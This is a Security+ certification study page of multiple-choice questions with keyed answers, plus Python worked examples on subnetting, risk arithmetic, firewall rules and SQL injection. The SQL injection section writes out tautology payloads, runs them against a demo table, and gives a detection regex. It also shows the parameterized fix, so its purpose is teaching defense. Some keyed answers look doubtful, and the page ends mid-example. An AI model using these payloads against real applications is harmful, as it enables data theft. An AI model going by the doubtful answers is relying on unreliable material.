Questions & answers study: Security+
A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is five and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection? A. $500 B. $1000 C. $2000 D. $2500
A. $500
Which of the following attacks can be used to exploit a vulnerability created by untrained users? A. A spear phishing email with file attachment B. A DoS using IoT devices C. An evil twin wireless access point D. A domain hijacking of a bank website
A. A spear phishing email with file attachment
A user needs to transmit confidential information to a third party. Which of the following should be used to encrypt the message? A. AES B. SHA-2 C. SSL D. RSA
A. AES
Which of the following can be implemented with multiple bit strength? A. AES B. DES C. SHA-1 D. MD5 E. MD4
A. AES
Which of the following encryption algorithms is used primarily to secure data at rest? A. AES B. SSL C. TLS D. RSA
A. AES
A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure? A. Accounting B. Authorization C. Authentication D. Identification
A. Accounting
A security administrator has replaced the firewall and notices a number of dropped connections. After looking at the data the security administrator sees the following information that was flagged as a possible issue: "SELECT " FROM" and '1' = '1' Which of the following can the security administrator determine from this? A. An SQL injection attack is being attempted. B. Legitimate connections are being dropped. C. A network scan is being done on the system. D. An XSS attack is being attempted.
A. An SQL injection attack is being attempted.
Which of the following could occur when both strong and weak ciphers are configured on a VPN concentrator? (Select TWO) A. An attacker could potentially perform a downgrade attack. B. The connection is vulnerable to resource exhaustion. C. The integrity of the data could be at risk. D. The VPN concentrator could revert to L2TP. E. The IPSec payload reverted to 16-bit sequence numbers.
A. An attacker could potentially perform a downgrade attack. C. The integrity of the data could be at risk. (Once an attacker forces negotiation of the weak cipher suite, both the confidentiality and the integrity protection of the tunnel rest on weak algorithms; option E does not describe any real IPsec behavior.)
A security administrator has completed a monthly review of DNS server query logs. The administrator notices continuous name resolution attempts from a large number of internal hosts to a single Internet addressable domain name. The security administrator then correlated those logs with the establishment of persistent TCP connections out to this domain. The connections seem to be carrying on the order of kilobytes of data per week. Which of the following is the MOST likely explanation for this anomaly? A. An attacker is exfiltrating large amounts of proprietary company data. B. Employees are playing multiplayer computer games. C. A worm is attempting to spread to other hosts via SMB exploits. D. Internal hosts have become members of a botnet.
D. Internal hosts have become members of a botnet. (Many hosts repeatedly resolving one domain and holding persistent connections that carry only kilobytes per week is command-and-control beaconing; bulk exfiltration would move far more data.)
A technician wants to implement a dual factor authentication system that will enable the organization to authorize access to sensitive systems on a need-to-know basis. Which of the following should be implemented during the authorization stage? A. Biometrics B. Mandatory access control C. Single sign-on D. Role-based access control
B. Mandatory access control (labels and clearances enforce need-to-know at the authorization stage; biometrics belong to the authentication stage).
A security analyst is assigned to perform a penetration test for one of the company's clients. During the scope discussion, the analyst is notified that the client is not going to share any information related to the environment to be tested. Which of the following BEST identifies this type of penetration testing? A. Black Box B. Gray Box C. White Box D. Blue Teaming
A. Black Box
A network stream needs to be encrypted. Sara, the network administrator, has selected a cipher which will encrypt 8 bits at a time before sending the data across the network. Which of the following has Sara selected? A. Block cipher B. Stream cipher C. CRC D. Hashing algorithm
B. Stream cipher (a cipher that encrypts one bit or one byte at a time is a stream cipher; block ciphers operate on fixed 64- or 128-bit blocks).
An administrator needs to renew a certificate for a web server. Which of the following should be submitted to a CA? A. CSR B. Recovery agent C. Private key D. CRL
A. CSR
A retail store recently deployed tablets for sales employees to use while assisting customers. Two of the tablets have already been lost or stolen. Which of the following would be the BEST way for the store to secure the tablets against future loss or theft? A. Cable locks B. Screen filters C. Geocaching D. Remote wipe
A. Cable locks
A user loses a COPE device. Which of the following should the user do NEXT to protect the data on the device? A. Call the company help desk to remotely wipe the device. B. Report the loss to authorities. C. Check with corporate physical security for the device. D. Identify files that are potentially missing on the device.
A. Call the company help desk to remotely wipe the device.
A security administrator wishes to increase the security of the wireless network. Which of the following BEST addresses this concern? A. Change the encryption from TKIP-based to CCMP-based. B. Set all nearby access points to operate on the same channel. C. Configure the access point to use WEP instead of WPA2. D. Enable all access points to broadcast their SSIDs.
A. Change the encryption from TKIP-based to CCMP-based.
Certificates are used for: (Select TWO). A. Client authentication. B. WEP encryption. C. Access control lists. D. Code signing. E. Password hashing.
A. Client authentication. D. Code signing.
An administrator wants to ensure that the reclaimed space of a hard drive has been sanitized while the computer is in use. Which of the following can be implemented? A. Cluster tip wiping B. Individual file encryption C. Full disk encryption D. Storage retention
A. Cluster tip wiping
A network technician must update the company's wireless configuration settings to comply with new requirements, which means the use of AES encryption. Which of the following settings would BEST ensure the requirements are met? A. Configure CCMP. B. Require TKIP. C. Implement WPA. D. Implement 802.1x
A. Configure CCMP.
Which of the following is an example of multifactor authentication? A. Credit card and PIN B. Username and password C. Password and PIN D. Fingerprint and retina scan
A. Credit card and PIN
Which of the following controls allows a security guard to perform a post-incident review? A. Detective B. Preventive C. Corrective D. Deterrent
A. Detective
During a penetration test, some servers in the network were found to be using Telnet as a remote connection protocol. Which of the following would mitigate the identified risk? A. Disable Telnet and deploy SSH. B. Disable Telnet and deploy SFTP. C. Disable Telnet and deploy SNMPv3. D. Disable Telnet and deploy S/MIME.
A. Disable Telnet and deploy SSH.
The security team would like to gather intelligence about the types of attacks being launched against the organization. Which of the following would provide them with the MOST information? A. Implement a honeynet B. Perform a penetration test C. Examine firewall logs D. Deploy an IDS
A. Implement a honeynet
When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal? A. Infrastructure B. Platform C. Software D. Virtualization
A. Infrastructure
An email client says a digital signature is invalid and the sender cannot be verified. The recipient is concerned with which of the following concepts? A. Integrity B. Availability C. Confidentiality D. Remediation
A. Integrity
Use of a smart card to authenticate remote servers remains MOST susceptible to which of the following attacks? A. Malicious code on the local system B. Shoulder surfing C. Brute force certificate cracking D. Distributed dictionary attacks
A. Malicious code on the local system
A technician wants to perform network enumeration against a subnet in preparation for an upcoming assessment. During the first phase, the technician performs a ping sweep. Which of the following scan types did the technician use? A. Non-Intrusive B. Intrusive C. Credentialed D. Passive
A. Non-Intrusive
The human resources department is outsourcing much of its operations to a third party. As part of the process, the local human resources data needs to be transmitted to the third party over the Internet. Which of the following is the BEST way to transmit the data? A. SFTP B. DNSSEC C. SNMPv3 D. LDAPS
A. SFTP
A customer calls a technician and needs to remotely connect to a web server to change some code manually. The technician needs to configure the user's machine with protocols to connect to the Unix web server, which is behind a firewall. Which of the following protocols does the technician MOST likely need to configure? A. SSH B. SFTP C. HTTPS D. SNMP
A. SSH
Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application? A. Sandboxing B. Encryption C. Code signing D. Fuzzing
A. Sandboxing
A user receives an email from ISP indicating malicious traffic coming from the user's home network is detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an Internet attack. The only Linux device on the network is a home surveillance camera system. Which of the following BEST describes what is happening? A. The camera system is infected with a bot. B. The camera system is infected with a RAT. C. The camera system is infected with a Trojan. D. The camera system is infected with a backdoor.
A. The camera system is infected with a bot.
Which of the following is BEST at blocking attacks and providing security at layer 7 of the OSI model? A. WAF B. NIDS C. Routers D. Switches
A. WAF
Which form of attack uses special programs that attempt all possible character combinations to determine passwords? A. brute-force attack B. dictionary attack C. password guessing D. birthday attack
A. brute-force attack
A security administrator has configured FTP in passive mode. Which of the following ports should the security administrator allow on the firewall by default? A. 20 B. 21 C. 22 D. 23
B. 21
After a significant amount of hiring, an organization would like to simplify the connection process to its wireless network for employees while ensuring maximum security. The Chief Information Officer (CIO) wants to get rid of any shared network passwords and require employees to use their company credentials when connecting. Which of the following should be implemented to BEST meet this requirement? A. PSK B. 802.1X C. CCMP D. TKIP
B. 802.1X
Which of the following metrics are used to calculate the SLE? (Select TWO) A. ROI B. ARO C. ALE D. MTBF E. MTTF F. TCO
B. ARO C. ALE
A company's new policy allows employees to connect to corporate email using BYOD. Since employees handle client information in their corporate email, which of the following should the company implement with BYOD? (Choose TWO) A. Enable rooting of the devices. B. Assign passwords and PINs to the devices. C. Disable remote wipe. D. Enable full-device encryption. E. Disable the devices' ability to connect to open networks. F. Allow third-party app stores.
B. Assign passwords and PINs to the devices. D. Enable full-device encryption.
Which of the following access management concepts is MOST closely associated with the use of a password or PIN? A. Authorization B. Authentication C. Accounting D. Identification
B. Authentication
Data execution prevention is a feature in most operating systems intended to protect against which type of attack? A. Cross-site scripting B. Buffer overflow C. Header manipulation D. SQL injection
B. Buffer overflow
Which of the following security controls provides an alternative solution to a control that would be considered unpractical or excessively expensive? A. Deterrent B. Compensating C. Technical D. Administrative
B. Compensating
Which of the following is the MOST secure protocol to transfer files? A. FTP B. FTPS C. SSH D. TELNET
B. FTPS
Ann, the security administrator, wishes to implement multifactor security. Which of the following should be implemented in order to complement password usage and smart cards? A. Hard tokens B. Fingerprint readers C. Swipe badge readers D. Passphrases
B. Fingerprint readers
Which of the following types of attacks involves interception of authentication traffic in an attempt to gain unauthorized access to a wireless network? A. Near field communication B. IV attack C. Evil twin D. Replay attack
D. Replay attack (captured authentication traffic is retransmitted to gain access; an IV attack targets WEP keystream reuse, not the authentication exchange).
An organization's IT department announced plans to upgrade workstation operating systems to the latest version after electing to skip the prior two versions. Which of the following vulnerabilities is the organization seeking to mitigate? A. Incompatibility issues with currently implemented software. B. Lack of vendor support on the version currently in use. C. Poorly defined security baselines. D. Use of expired certificates on the network.
B. Lack of vendor support on the version currently in use.
Which of the following network design elements allows for many internal devices to share one public IP address? A. DNAT B. PAT C. DNS D. DMZ
B. PAT
Which of the following are used to increase the computing time it takes to brute force a password using offline attack? (Select TWO) A. XOR B. PBKDF2 C. bcrypt D. HMAC E. RIPEMD
B. PBKDF2 C. bcrypt
Maintenance workers find an active network switch hidden above a dropped-ceiling tile in the CEO's office with various connected cables from the office. Which of the following describes the type of attack that was occurring? A. Spear phishing B. Packet sniffing C. Impersonation D. MAC flooding
B. Packet sniffing
A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed? A. Aggressive scan B. Passive scan C. Non-credentialed scan D. Compliance scan
B. Passive scan
All of the following are valid cryptographic hash functions EXCEPT: A. RIPEMD. B. RC4. C. SHA-512. D. MD4.
B. RC4.
Which of the following types of embedded systems is required in manufacturing environments with life safety requirements? A. MFD B. RTOS C. SoC D. RTU
B. RTOS
Pete, an employee, is terminated from the company and the legal department needs documents from his encrypted hard drive. Which of the following should be used to accomplish this task? (Select TWO). A. Private hash B. Recovery agent C. Public key D. Key escrow E. CRL
B. Recovery agent D. Key escrow
Identifying residual risk is MOST important to which of the following concepts? A. Risk deterrence B. Risk acceptance C. Risk mitigation D. Risk avoidance
B. Risk acceptance
A network administrator is asked to send a large file containing PII to a business associate. Which of the following protocols is the BEST choice to use? A. SSH B. SFTP C. SMTP D. FTP
B. SFTP
In order for Sara, a client, to logon to her desktop computer, she must provide her username, password, and a four digit PIN. Which of the following authentication methods is Sara using? A. Three factor B. Single factor C. Two factor D. Four factor
B. Single factor
An organization wants to ensure servers and applications can be deployed rapidly, in a consistent manner, and allow for flexible configuration changes. Which of the following should the organization use to make this process repeatable across multiple locations? A. Redundancy B. Templates C. Snapshots D. Elasticity E. Configuration validation
B. Templates
The concept of rendering data passing between two points over an IP based network impervious to all but the most sophisticated advanced persistent threats is BEST categorized as which of the following? A. Stream ciphers B. Transport encryption C. Key escrow D. Block ciphers
B. Transport encryption
Which of the following components of an all-in-one security appliance would MOST likely be configured in order to restrict access to peer-to-peer file sharing websites? A. Spam filter B. URL filter C. Content inspection D. Malware inspection
B. URL filter
A systems administrator wants to provide a balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security and backward compatibility when accessing the wireless network? A. Open wireless network and SSL VPN B. WPA using a preshared key C. WPA2 using a RADIUS back-end for 802.1x authentication D. WEP with a 40-bit key
B. WPA using a preshared key
Which of the following are considered among the BEST indicators that a received message is a hoax? (Select TWO) A. Minimal use of uppercase in the message B. Warnings of monetary loss to the receiver C. No valid digital signature from a known security organization D. Claims of possible damage to computer hardware E. Embedded URLs
B. Warnings of monetary loss to the receiver D. Claims of possible damage to computer hardware
Which of the following is a BEST practice when dealing with user accounts that will only need to be active for a limited time period? A. When creating the account, set the account to not remember password history. B. When creating the account, set an expiration date on the account. C. When creating the account, set a password expiration date on the account. D. When creating the account, set the account to have time of day restrictions.
B. When creating the account, set an expiration date on the account.
A systems administrator has isolated an infected system from the network and terminated the malicious process from executing. Which of the following should the administrator do NEXT according to the incident response process? A. Restore lost data from a backup. B. Wipe the system. C. Document the lessons learned. D. Determine the scope of impact
B. Wipe the system.
Which of the following is a management control? A. Logon banners B. Written security policy C. SYN attack prevention D. Access Control List (ACL)
B. Written security policy
Which of the following IP addresses would be hosts on the same subnet given the subnet mask 255.255.255.224? (Select TWO). A. 10.4.4.125 B. 10.4.4.158 C. 10.4.4.165 D. 10.4.4.189 E. 10.4.4.199
C. 10.4.4.165 D. 10.4.4.189
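The subnet question above is answered by ANDing each address with the mask and comparing the results. The following Python is an added worked example, not part of the original study material; the five addresses and the 255.255.255.224 (/27) mask are the ones from the question, and it generalizes to any address list and mask.

```python
"""Group host addresses by subnet for a given mask.

Added worked example; not part of the original study material. The
addresses and the /27 mask (255.255.255.224) are taken from the question.
"""
import ipaddress
from collections import defaultdict
from typing import Dict, List


def network_of(address: str, mask: str) -> ipaddress.IPv4Network:
    """Return the network an address belongs to: (address AND mask)/prefix."""
    return ipaddress.ip_interface(f"{address}/{mask}").network


def manual_network_id(address: str, mask: str) -> str:
    """The same calculation done by hand: bitwise AND of address and mask."""
    a = int(ipaddress.IPv4Address(address))
    m = int(ipaddress.IPv4Address(mask))
    return str(ipaddress.IPv4Address(a & m))


def group_by_subnet(addresses: List[str], mask: str) -> Dict[str, List[str]]:
    """Map each network (CIDR string) to the addresses that fall inside it."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for a in addresses:
        groups[str(network_of(a, mask))].append(a)
    return dict(groups)


def hosts_sharing_a_subnet(addresses: List[str], mask: str) -> List[str]:
    """Addresses that share their subnet with at least one other address."""
    return [a
            for members in group_by_subnet(addresses, mask).values()
            if len(members) > 1
            for a in members]


if __name__ == "__main__":
    QUESTION = ["10.4.4.125", "10.4.4.158", "10.4.4.165", "10.4.4.189", "10.4.4.199"]
    MASK = "255.255.255.224"   # /27: 32 addresses per subnet, blocks at .96/.128/.160/.192
    for net, members in group_by_subnet(QUESTION, MASK).items():
        print(net, members)
    print(hosts_sharing_a_subnet(QUESTION, MASK))   # ['10.4.4.165', '10.4.4.189']
```

With a /27 the fourth octet is divided into blocks of 32, so .160 through .191 is one subnet; only .165 and .189 land in the same block.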
Which of the following would BEST deter an attacker trying to brute force 4-digit PIN numbers to access an account at a bank teller machine? A. Account expiration settings B. Complexity of PIN C. Account lockout settings D. PIN history requirements
C. Account lockout settings
Which of the following development models entails several iterative and incremental software development methodologies such as SCRUM? A. Spiral B. Waterfall C. Agile D. Rapid
C. Agile
Which of the following encryption methods does PKI typically use to securely protect keys? A. Elliptic curve B. Digital signatures C. Asymmetric D. Obfuscation
C. Asymmetric
In Kerberos, the Ticket Granting Ticket (TGT) is used for which of the following? A. Identification B. Authorization C. Authentication D. Multifactor authentication
C. Authentication
For this common security issue, the first item to check as you begin the troubleshooting process is that the correct username and password have been entered. A. Baseline deviation B. Unauthorized software C. Authentication errors D. Clear-text credentials
C. Authentication errors
Which of the following access management concepts is associated with file permissions? A. Authentication B. Accounting C. Authorization D. Identification
C. Authorization
Which of the following is an asymmetric function that generates a new and separate key every time it runs? A. RSA B. DSA C. DHE D. HMAC E. PBKDF2
C. DHE
To help prevent SQL injection, which of the following functions should the application developer implement? A. Error handling B. Code signing C. Input validation D. Model verification
C. Input validation
A security specialist must confirm file backups match the original copy. Which of the following should the security specialist use to accomplish the objective? A. AES B. 3DES C. MD5 D. RSA
C. MD5
Which of the following is used to validate the integrity of data? A. CBC B. Blowfish C. MD5 D. RSA
C. MD5
Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal? A. PIN B. Security question C. Smart card D. Passphrase E. CAPTCHA
C. Smart card
Which of the following has a storage root key? A. HSM B. EFS C. TPM D. TKIP
C. TPM
Users are able to reach the login page of their company website from home using HTTP. A network administrator disables HTTP and implements SSL. However, after the implementation, home users cannot access the login page of the company website. Which of the following is the MOST likely reason the site is unavailable? A. The user's browsers are not equipped for SSL. B. The company website implements HTTP redirects. C. The company firewall is blocking port 443 traffic. D. The company web server is using an expired certificate.
C. The company firewall is blocking port 443 traffic.
A DFIR analyst is collecting log data from multiple global locations. Which of the following must the DFIR analyst do to properly utilize the logs for forensic analysis? A. Log encryption B. Filling out chain of custody C. Time normalization D. Timesheet update
C. Time normalization
Which of the following methods is used by internal security teams to assess the security of internally developed applications? A. Active reconnaissance B. Pivoting C. White box testing D. Persistence
C. White box testing
Which of the following ports is used for SSH, by default? A. 23 B. 32 C. 12 D. 22
D. 22
Which of the following ports and protocol types must be opened on a host with a host-based firewall to allow incoming SFTP connections? A. 21/UDP B. 21/TCP C. 22/UDP D. 22/TCP
D. 22/TCP
Which of the following BEST describes the impact of an unremediated session timeout vulnerability? A. The credentials of a legitimate user could be intercepted and reused to log in when the legitimate user is offline. B. An attacker has more time to attempt brute-force password cracking. C. More than one user may be allowed to concurrently connect to the system, and an attacker can use one of those concurrent connections. D. An attacker could use an existing session that has been initiated by a legitimate user.
D. An attacker could use an existing session that has been initiated by a legitimate user.
Which of the following locations contain the MOST volatile data? A. SSD B. Paging file C. RAM D. Cache memory
D. Cache memory
Which of the following technologies can store multi-tenant data with different security requirements? A. Data loss prevention B. Trusted platform module C. Hard drive encryption D. Cloud computing
D. Cloud computing
Which of the following computer recovery sites is the least expensive and the most difficult to test at the same time? A. Non-mobile hot site B. Mobile hot site C. Warm site D. Cold site
D. Cold site
Customers' credit card information was stolen from a popular video streaming company. A security consultant determined that the information was stolen, while in transit, from the gaming consoles of a particular vendor. Which of the following methods should the company consider to secure this data in the future? A. Application firewalls B. Manual updates C. Firmware version control D. Encrypted TCP wrappers
D. Encrypted TCP wrappers
In which of the following steps of incident response does a team analyze the incident and determine steps to prevent a future occurrence? A. Mitigation B. Identification C. Preparation D. Lessons learned
D. Lessons learned
A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted media. Which of the following BEST describes the action performed by this type of application? A. Hashing B. Key exchange C. Encryption D. Obfuscation
D. Obfuscation
When creating a public / private key pair, for which of the following ciphers would a user need to specify the key strength? A. SHA B. AES C. DES D. RSA
D. RSA
A security specialist is notified about a certificate warning that users receive when using a new internal website. After being given the URL from one of the users and seeing the warning, the security specialist inspects the certificate and realizes it has been issued to the IP address, which is how the developers reach the site. Which of the following would BEST resolve the issue? A. OCSP B. OID C. PEM D. SAN
D. SAN
By default, which of the following uses TCP port 22? (Select THREE). A. FTPS B. STELNET C. TLS D. SCP E. SSL F. HTTPS G. SSH H. SFTP
D. SCP G. SSH H. SFTP
Logs from an IDS alerted on a string entered into the company's website login page. The following line was pulled from the HTTP POST request. userid=bob' and 1='1&request=Submit Which of the following was attempted? A. Reflected XSS B. Stored XSS C. Cross-site request forgery D. SQL injection
D. SQL injection
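The three SQL injection questions on this page (the `SELECT * FROM ... '1' = '1'` firewall log, the input validation question, and the `userid=bob' and 1='1` POST above) come down to the same thing: user input spliced into a query becomes SQL syntax. The following Python is an added worked example, not part of the original study material. It shows the vulnerable concatenation, the parameterized fix, and a simple detection rule run over the POST body from the question; the users table, field names and regex are constructed for illustration.

```python
"""SQL injection: vulnerable lookup, parameterized fix, and log detection.

Added worked example; not part of the original study material. The POST
body "userid=bob' and 1='1&request=Submit" is the one from the question;
the users table, field names and detection regex are constructed.
"""
import re
import sqlite3
from typing import Dict, List
from urllib.parse import parse_qs


def setup_db() -> sqlite3.Connection:
    """In-memory table standing in for the site's user store (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid TEXT PRIMARY KEY, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("bob", "bob-secret"), ("alice", "alice-secret")])
    return conn


def build_vulnerable_sql(userid: str) -> str:
    """String concatenation: whatever the user typed becomes part of the SQL."""
    return "SELECT secret FROM users WHERE userid = '" + userid + "'"


def lookup_vulnerable(conn: sqlite3.Connection, userid: str) -> List[str]:
    """Runs the concatenated query; a quote-breakout tautology returns every row."""
    return [row[0] for row in conn.execute(build_vulnerable_sql(userid))]


def lookup_parameterized(conn: sqlite3.Connection, userid: str) -> List[str]:
    """Bound parameter: the input is always data, never SQL, so the probe
    simply looks for a user literally named "bob' and 1='1" and finds none."""
    sql = "SELECT secret FROM users WHERE userid = ?"
    return [row[0] for row in conn.execute(sql, (userid,))]


# Quote-breakout tautologies (' and 1='1, ' or 'a'='a), UNION SELECT,
# comment terminators and stacked statements. A starting point for an
# IDS/WAF signature, not a complete one.
SQLI_PATTERN = re.compile(
    r"""['"]\s*(?:and|or)\s+\S+?\s*=\s*\S+      # quote-breakout tautology
      | \bunion\b\s+(?:all\s+)?\bselect\b      # union-based extraction
      | --|/\*|;\s*(?:drop|delete|update)\b    # comment / stacked statement
    """, re.IGNORECASE | re.VERBOSE)


def flag_sqli(post_body: str) -> Dict[str, str]:
    """Return {field: value} for each form field whose value matches SQLI_PATTERN."""
    fields = parse_qs(post_body, keep_blank_values=True)
    return {name: value
            for name, values in fields.items()
            for value in values
            if SQLI_PATTERN.search(value)}


if __name__ == "__main__":
    db = setup_db()
    print(build_vulnerable_sql("bob' and 1='1"))
    print(lookup_vulnerable(db, "x' or '1'='1"))      # both secrets leak
    print(lookup_parameterized(db, "x' or '1'='1"))   # []
    print(flag_sqli("userid=bob' and 1='1&request=Submit"))
```

Input validation (allow-listing the characters a user ID may contain) reduces the attack surface, but the parameterized query is what actually removes the vulnerability: the database receives the statement and the data separately and never parses the data as SQL.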
Using proximity card readers instead of the traditional key punch doors would help to mitigate: A. Impersonation B. Tailgating C. Dumpster diving D. Shoulder surfing
D. Shoulder surfing
Which of the following would allow the organization to divide a Class C IP address range into several ranges? A. DMZ B. Virtual LANs C. NAT D. Subnetting
D. Subnetting
A call center company wants to implement a domain policy primarily for its shift workers. The call center has large groups with different user roles. Management wants to monitor group performance. Which of the following is the BEST solution for the company to implement? A. Reduced failed logon attempts. B. Mandatory password changes. C. Increased account lockout time. D. Time-of-day restrictions.
D. Time-of-day restrictions.
To get the most accurate results on the security posture of a system, which of the following actions should the security analyst do prior to scanning? A. Log all users out of the system. B. Patch the scanner. C. Reboot the target host. D. Update the plugins.
D. Update the plugins.
A security analyst is implementing PKI-based functionality to a web application that has the following requirements:
- File contains certificate information
- Certificate chains
- Root authority certificates
- Private key
All of these components will be part of one file and cryptographically protected with a password. Given the scenario, which of the following certificate types should the analyst implement to BEST meet these requirements? A. .pfx certificate B. .cer certificate C. .der certificate D. .crt certificate
A. .pfx certificate (a PKCS#12 container, which is the only format listed that bundles the private key with the certificate chain under a password)
A security analyst is hardening a large-scale wireless network. The primary requirements are the following: Must use authentication through EAP-TLS certificates Must use an AAA server Must use the most secure encryption protocol Given these requirements, which of the following should the analyst implement and recommend? (Select TWO). A. 802.1X B. 802.3 C. LDAP D. TKIP E. CCMP F. WPA2-PSK
A. 802.1X E. CCMP
Which of the following controls would allow a company to reduce the exposure of sensitive systems from unmanaged devices on internal networks? A. 802.1x B. Data encryption C. Password strength D. BGP
A. 802.1x
A systems administrator has implemented PKI on a classified government network. In the event that a disconnect occurs from the primary CA, which of the following should be accessible locally from every site to ensure users with bad certificates cannot gain access to the network? A. A CRL B. Make the RA available C. A verification authority D. A redundant CA
A. A CRL
Which of the following is an example of resource exhaustion? A. A penetration tester requests every available IP address from a DHCP server. B. An SQL injection attack returns confidential data back to the customer. C. Server CPU utilization peaks at 100% during the reboot process. D. System requirements for a new software package recommend having 12GB of RAM, but only 8GB are available.
A. A penetration tester requests every available IP address from a DHCP server.
Which of the following differentiates a collision attack from a rainbow table attack? A. A rainbow table attack performs a hash lookup. B. A rainbow table attack uses the hash as a password. C. In a collision attack, the hash and the input data are equivalent. D. In a collision attack, the same input results in different hashes.
A. A rainbow table attack performs a hash lookup.
Sara, a security manager, has decided to force expiration of all company passwords by the close of business day. Which of the following BEST supports this reasoning? A. A recent security breach in which passwords were cracked. B. Implementation of configuration management processes. C. Enforcement of password complexity requirements. D. Implementation of account lockout procedures.
A. A recent security breach in which passwords were cracked.
An organization is deploying a new system to the production environment. A security analyst discovers the system is not properly hardened or patched. Which of the following BEST describes the scenario? A. A secure baseline was not established early in the process. B. User acceptance testing was not completed. C. Integrity checks were not conducted to ensure it was the correct system. D. An application code error was introduced during the development phase.
A. A secure baseline was not established early in the process.
A security consultant is gathering information about the frequency of a security threat's impact to an organization. Which of the following should the consultant use to label the number of times an attack can be expected to impact the organization in a 365-day period? A. ARO B. MTBF C. ALE D. MTTR E. SLA
A. ARO
To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO). A. ARO B. ROI C. RPO D. SLE E. RTO
A. ARO D. SLE
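Several questions on this page (the $2,500 malware-protection decision, the SLE metrics, the ARO definition and the ALE calculation just above) use the same arithmetic: SLE = AV x EF, ALE = SLE x ARO, and a control is only worth buying when the ALE it removes exceeds what it costs per year. The following Python is an added worked example, not part of the original study material. The only figures taken from the questions are ARO = 5 and the $2,500 annual control cost; the asset value and exposure factor are constructed.

```python
"""Single loss expectancy / annualized loss expectancy arithmetic.

Added worked example; not part of the original study material. The only
figures taken from the questions are ARO = 5 and an annual control cost
of $2,500 (the malware-protection question); the asset value and exposure
factor used in __main__ are constructed for illustration.
"""
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Risk:
    asset_value: float      # AV: dollar value of the asset at risk
    exposure_factor: float  # EF: fraction of AV lost in one incident (0.0..1.0)
    aro: float              # ARO: expected incidents per 365-day period

    def sle(self) -> float:
        """Single loss expectancy: SLE = AV x EF."""
        return self.asset_value * self.exposure_factor

    def ale(self) -> float:
        """Annualized loss expectancy: ALE = SLE x ARO."""
        return self.sle() * self.aro


def sle_from_ale(ale: float, aro: float) -> float:
    """Recover SLE when only ALE and ARO are known: SLE = ALE / ARO."""
    return ale / aro


def break_even_sle(annual_control_cost: float, aro: float) -> float:
    """SLE at which the ALE exactly equals the yearly cost of the control.

    At or below this value the control costs at least as much per year as
    the loss it prevents, so it is not justified on cost/benefit grounds.
    """
    return annual_control_cost / aro


def control_is_worth_buying(ale_without: float, ale_with: float,
                            annual_control_cost: float) -> bool:
    """Cost/benefit test: the reduction in ALE must exceed the control's cost."""
    return (ale_without - ale_with) > annual_control_cost


def sle_values_against_purchase(candidates: List[float], aro: float,
                                annual_control_cost: float) -> List[float]:
    """Candidate SLEs for which buying the control is NOT justified.

    Assumes the control eliminates the loss entirely (ALE with control = 0),
    so the benefit is the whole ALE = SLE x ARO.
    """
    return [s for s in candidates
            if not control_is_worth_buying(s * aro, 0.0, annual_control_cost)]


if __name__ == "__main__":
    # The malware-protection question: ARO = 5, control cost $2,500 per year.
    print(sle_values_against_purchase([500, 1000, 2000, 2500], 5, 2500))  # [500]
    print(break_even_sle(2500, 5))                                        # 500.0
    # Constructed asset: $100,000 server, 25% loss per incident, twice a year.
    r = Risk(asset_value=100_000, exposure_factor=0.25, aro=2)
    print(r.sle(), r.ale())                                               # 25000.0 50000.0
```

For the malware question, an SLE of $500 gives ALE = 5 x $500 = $2,500, exactly the cost of the control, so there is no net benefit and the recommendation is against purchase; every higher SLE in the list makes the control cheaper than the expected loss.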
Which of the following enables sniffing attacks against a switched network? A. ARP poisoning B. IGMP snooping C. IP spoofing D. SYN flooding
A. ARP poisoning
Which of the following differentiates ARP poisoning from a MAC spoofing attack? A. ARP poisoning uses unsolicited ARP replies. B. ARP poisoning overflows a switch's CAM table. C. MAC spoofing uses DHCPOFFER/DHCPACK packets. D. MAC spoofing can be performed across multiple routers.
A. ARP poisoning uses unsolicited ARP replies.
A security administrator is reviewing the following firewall configuration after receiving reports that users are unable to connect to remote websites:
10 PERMIT FROM:ANY TO:ANY PORT:80
20 PERMIT FROM:ANY TO:ANY PORT:443
30 DENY FROM:ANY TO:ANY PORT:ANY
Which of the following is the MOST secure solution the security administrator can implement to fix this issue? A. Add the following rule to the firewall: 5 PERMIT FROM:ANY TO:ANY PORT:53 B. Replace rule number 10 with the following rule: 10 PERMIT FROM:ANY TO:ANY PORT:22 C. Insert the following rule in the firewall: 25 PERMIT FROM:ANY TO:ANY PORTS:ANY D. Remove the following rule from the firewall: 30 DENY FROM:ANY TO:ANY PORT:ANY
A. Add the following rule to the firewall: 5 PERMIT FROM: ANY TO:ANY PORT:53
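The ruleset is evaluated top to bottom and the first match wins, so browsing fails because DNS (port 53) falls through to rule 30 before any web request is made. The following Python is an added worked example, not part of the original study material: it models first-match evaluation with an implicit deny and checks each of the four answer options against the ports browsing needs. The rule format and the ports come from the question; the evaluation model and the probe ports are assumptions.

```python
"""First-match firewall rule evaluation for the ruleset in the question.

Added worked example; not part of the original study material. The three
original rules and the four candidate fixes come from the question; the
evaluation model (first matching rule wins, then a default action) is the
usual one for ordered ACLs and is assumed here.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Rule:
    seq: int
    action: str           # "PERMIT" or "DENY"
    port: Optional[int]   # None means PORT:ANY


def evaluate(rules: List[Rule], dst_port: int, default: str = "DENY") -> str:
    """Walk rules in sequence order; the first match decides. Otherwise default."""
    for rule in sorted(rules, key=lambda r: r.seq):
        if rule.port is None or rule.port == dst_port:
            return rule.action
    return default


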